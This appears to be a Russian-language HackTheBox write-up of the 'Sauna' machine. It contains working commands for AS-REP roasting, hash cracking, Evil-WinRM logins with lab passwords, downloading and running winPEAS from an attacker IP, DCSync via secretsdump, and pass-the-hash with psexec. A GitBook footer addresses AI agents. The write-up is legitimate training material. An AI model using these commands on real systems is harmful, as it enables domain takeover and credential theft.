> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/windows-easy/sauna-hackthebox-writeup.md).

# Разбор Sauna на HackTheBox

{% embed url="<https://app.hackthebox.com/machines/229>" %}

{% hint style="warning" %}
**Навыки**:

* Утечка информации
* Перечисление LDAP
* Перечисление пользователей Kerberos - Kerbrute
* Атака AS-REP Roasting (GetNPUsers)
* Взлом хэшей
* Перечисление системы - WinPEAS
* Учетные данные автологина
* BloodHound - SharpHound.ps1
* Атака DCSync - Secretsdump (повышение привилегий)
* Передача хэша
  {% endhint %}

## Разведка <a href="#reconnaissance" id="reconnaissance"></a>

**Настройка рабочей среды:**

Настройте рабочую среду, создав три папки для хранения важного содержимого, эксплойтов и результатов разведки Nmap.

<figure><img src="/files/7191bd9e527b6222e5f2a83ef26d89964260d22a" alt=""><figcaption></figcaption></figure>

**Проверка подключения VPN**

Проверьте подключение к VPN, чтобы обеспечить стабильную связь с целевой машиной.

<figure><img src="/files/7c337807945b68e16ed5efe5450df31306f69a61" alt=""><figcaption></figcaption></figure>

**Обнаружение открытых портов с помощью Nmap:**

```bash
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.175 -oG allPorts
```

<figure><img src="/files/0e3a3e6c3343250a1ca078000cd07278218f1c13" alt=""><figcaption></figcaption></figure>

**Анализ открытых портов с помощью extractport:**/ Использование функции extractport для краткого отображения открытых портов и копирования их в буфер обмена.

<figure><img src="/files/8c15f0992f44199dd6eb845a6090806e73b6c28b" alt=""><figcaption></figcaption></figure>

**Сканирование версий портов с помощью Nmap:**/ Используйте Nmap для сканирования версий служб и сохранения вывода в файл "targeted":

```bash
nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49668,49675,49676,49677,49736,49802 10.10.10.175 -oN targeted
```

<figure><img src="/files/6714cb326d645b848fc63a407b25d3b02de37466" alt=""><figcaption></figcaption></figure>

## **Перечисление и эксплуатация:**

### **Разведка SMB:**

Использование CrackMapExec для определения операционной системы

```bash
crackmapexec smb 10.10.10.175
```

<div data-full-width="true"><figure><img src="/files/49977160a77e71a2ced2ef3a71383ebcacef44d9" alt=""><figcaption></figcaption></figure></div>

Чтобы разрешить доменные имена в IP-адреса через DNS, доменное имя, связанное с его IP-адресом, вставляется в `/etc/hosts` файле.<br>

<figure><img src="/files/ec5640ddf306f46274399ad2a656ba7cb590f3f1" alt=""><figcaption></figcaption></figure>

#### Исследование SMB-общих ресурсов в сети для выявления общих ресурсов, но результатов нет.

```bash
crackmapexec smb 10.10.10.175 --shares
```

<figure><img src="/files/4628e4c3956b0a5987551c3af2f9da76609cc3ac" alt=""><figcaption></figcaption></figure>

```bash
smbmap -H 10.10.10.175 -u 'null'
```

<figure><img src="/files/07d473a2896ce8be694cd4bd09536d4c3826c319" alt=""><figcaption></figcaption></figure>

```bash
smbclient -L 10.10.10.175 -N
```

<figure><img src="/files/6ea591997aa4457c0fdc4121e9d63eaa268f6887" alt=""><figcaption></figcaption></figure>

### **Разведка RPC:**

Использование rpcclient для взаимодействия с службами CPP и сбора информации о ресурсах

```bash
rpcclient -U "" 10.10.10.175 -N
enumdomusers
```

<figure><img src="/files/9a7ed57a577ed32fc94107115faefb860709a9b5" alt=""><figcaption></figcaption></figure>

### **Разведка LDAP:**

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap#ldapsearch>" %}

#### Анализ информации LDAP для сведений о структуре домена и пользователях.

```bash
ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts
```

<figure><img src="/files/459a70646d0ae275bd440c4d368cbb5c18457fee" alt=""><figcaption></figcaption></figure>

**Анализ информации LDAP**

Анализ сведений о структуре домена и пользователях.

```bash
ldapsearch -x -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL
```

**Фильтрация пользователей LDAP**

Фильтр для получения только пользователей LDAP.

```bash
ldapsearch -x -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' | grep "dn: CN=" | sed 's/dn: CN=//;s/,DC=EGOTISTICAL-BANK,DC=LOCAL//'
```

<div data-full-width="true"><figure><img src="/files/c40aafe85e1be662e8fb5631acdc6423128e067e" alt=""><figcaption></figcaption></figure></div>

### Список пользователей:

<figure><img src="/files/c5df9090eff6c5611f7b911b40ee8b1580ba8087" alt=""><figcaption></figcaption></figure>

#### Создайте `users.txt` файл, содержащий возможные имена пользователей.

```
hugosmith
h.smith 
hugo.smith
hsmith

fergussmith
f.smith 
fergus.smith 
fsmith

hugobear
h.bear
hugo.bear
hbear

stevenkerb
s.kerb
steven.kerb
skerb

shauncoins
s.coins
shaun.coins
scoins

bowietaylor
b.taylor
bowie.taylor
btaylor

sophiedriver
s.driver
sophie.driver
sdriver
```

### **Список пользователей через Kerberos**

Используя `kerbrute` для получения списка действительных пользователей.

```bash
./kerbrute userenum -d egotistical-bank.local --dc 10.10.10.175 users.txt
```

<figure><img src="/files/060a31bf3289875b30fe575525ff3ef2091aa00d" alt=""><figcaption></figcaption></figure>

### **Список пользователей через Impacket**

Используя `impacket-GetNPUsers` для получения списка действительных пользователей без паролей.

```bash
impacket-GetNPUsers egotistical-bank.local/ -no-pass -usersfile users.txt
```

<figure><img src="/files/bcc09046a092ce70a81500a9fb5c5c8c35fd62a4" alt=""><figcaption></figcaption></figure>

### Атака грубой силы:

Использование John для взлома восстановленного хэша.

<pre class="language-bash"><code class="lang-bash"><strong>john --wordlist=/usr/share/wordlists/rockyou.txt hash
</strong></code></pre>

<div data-full-width="true"><figure><img src="/files/dabb61b3aade6ca57ec6b423257556d912c5b228" alt=""><figcaption></figcaption></figure></div>

#### Подключение и удалённое управление

Использование WinRM для удалённого подключения.

```bash
crackmapexec smb 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
```

#### Это работает, но без отметки pwned невозможно подключиться через WinRM.

<figure><img src="/files/24e8c25dc18abc0e62c7ecff73a03a7cc84e759f" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/52f586f109350d1e3d59e4ecf00d5ddcccefe5d5" alt=""><figcaption></figcaption></figure>

В этом примере подключение возможно, потому что пользователь fsmith является членом группы /\*Remote Management Users

```bash
crackmapexec winrm 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
```

<div data-full-width="true"><figure><img src="/files/6f1d351b0036aee36e57caf3bdb5b9cf0ec133e4" alt=""><figcaption></figcaption></figure></div>

#### **Вход с помощью Evil-WinRM**

Использование Evil-WinRM для интерактивного подключения через WinRM.

```bash
evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
```

<figure><img src="/files/6120f32ffa513d89499f1d85a212ce41ed0d1c3f" alt=""><figcaption></figcaption></figure>

## Повышение привилегий:

#### **Проверка особых привилегий:**

Используя `whoami /priv` для проверки особых привилегий.

<figure><img src="/files/3c006a2883d5bb10cba5b6abce98f55127510462" alt=""><figcaption></figcaption></figure>

#### **Поиск новых пользователей**

Используя `net user` для поиска новых пользователей.

<figure><img src="/files/a3079b377dcab829dcb6f64f8638db16af922b5f" alt=""><figcaption></figcaption></figure>

**Поиск учетных данных для пользователя "svc/ loanmgr"**

### **Обнаружение с помощью** winPEAS.exe

{% embed url="<https://github.com/carlospolop/PEASS-ng/releases/tag/20220717>" %}

Скачать и запустить инструмент разведки winPEAS

```bash
Invoke-WebRequest -Uri "http://10.10.14.4:445/winPEASx64.exe" -OutFile "winPEAS.exe"
./winPEAS.exe
```

<div data-full-width="true"><figure><img src="/files/6b542c011091031a2cea0d109a828cd3f15d427f" alt=""><figcaption></figcaption></figure></div>

<figure><img src="/files/56c6ce18fd97763a801e9d5ba3dffd574e27f907" alt=""><figcaption></figcaption></figure>

### Проверка учетных данных, найденных с помощью crackmapexec:

Автоматические учетные данные для входа пользователя `svc_loanmgr` были найдены, с паролем

<figure><img src="/files/6743a77f61e97d0df14e10de2ddab1338c18739a" alt=""><figcaption></figcaption></figure>

#### Использование crackmapexec для проверки правильности пароля.

```bash
crackmapexec winrm 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'
```

<div data-full-width="true"><figure><img src="/files/a6e75292743637c7a3262a3904955bb4b7997d63" alt=""><figcaption></figcaption></figure></div>

### Подключение с учетными данными "svc/ loanmgr":

```bash
evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'
```

<figure><img src="/files/7815a9ae2f3ae02fb99cc79f435789c5aeb3105f" alt=""><figcaption></figcaption></figure>

## Список домена с BloodHound:

<details>

<summary>Установка BloodHound:</summary>

```bash
apt install neo4j bloodhound
neo4j console &> /dev/null & disown
lsof -i:7474
```

#### Подключение к BloodHound с учетными данными neo4j:neo4j.

<img src="/files/6729240876bdc0d9c7cd7f3350800df9aa90e9fb" alt="" data-size="original">

#### Запуск BloodHound.

```bash
bloodhound &> /dev/null & disown
```

<img src="/files/102be38bf55cb0c0e3eea2db8e8077fb8713af2b" alt="" data-size="original">

</details>

### Сбор информации с помощью SharpHound.ps1

{% embed url="<https://github.com/puckiestyle/powershell/blob/master/SharpHound.ps1>" %}

<figure><img src="/files/14424abbdcdb724d5072c7439ae13c9977b92518" alt=""><figcaption></figcaption></figure>

### Передача собранных данных в Linux и импорт в BloodHound

#### Создать zip-файл с результатами сбора.

```bash
Import-Module ./sharhound.ps1
Invoke-BloodHound -CollectionMethod All
```

#### Загрузить zip-файл с машины Windows на Linux.

```powershell
download PS C:/windows/temp/privesc/file.zip file.zip
```

#### Импортировать zip-файл в BloodHound.

<figure><img src="/files/4c1ef599c8168c501b223f60a2b38c117fd2c162" alt=""><figcaption></figcaption></figure>

### Анализ и эксплуатация:

#### Фильтр по кратчайшему пути к администрированию

<figure><img src="/files/33167356bfb4dc241ed02e4b61fd60ad6036f947" alt=""><figcaption></figcaption></figure>

#### Инструмент указывает на возможность выполнения атаки DCSync.

<div data-full-width="true"><figure><img src="/files/a3bc22149f7f8df1e452818f9ddb8be18649bac0" alt=""><figcaption></figcaption></figure></div>

## Уязвимость: атака DCSync

{% embed url="<https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync>" %}

#### Использование secretsdump для получения NT-хэша пользователя administrator.

```bash
impacket-secretsdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175
```

<figure><img src="/files/fc34381e156bc07666dc03cfe4ca216408e1a288" alt=""><figcaption></figcaption></figure>

#### Использование psexec для запуска cmd от имени администратора с использованием NT-хэша.

```bash
impacket-psexec EGOTISTICAL-BANK.LOCAL/Administrator@10.10.10.175 cmd.exe -hashes :823452073d75b9d1cf70ebdf86c7f98e
```

<figure><img src="/files/23883ab817ba369d8a3e0a14fb169e4952f90c79" alt=""><figcaption></figcaption></figure>

### Финальный флаг :)

<figure><img src="/files/c09e34b3b18eb51650916271364f2810805beb78" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5be9719c9073b66e0c0a4a0a3447f8a8e9c36bbd" alt="" width="563"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/windows-easy/sauna-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
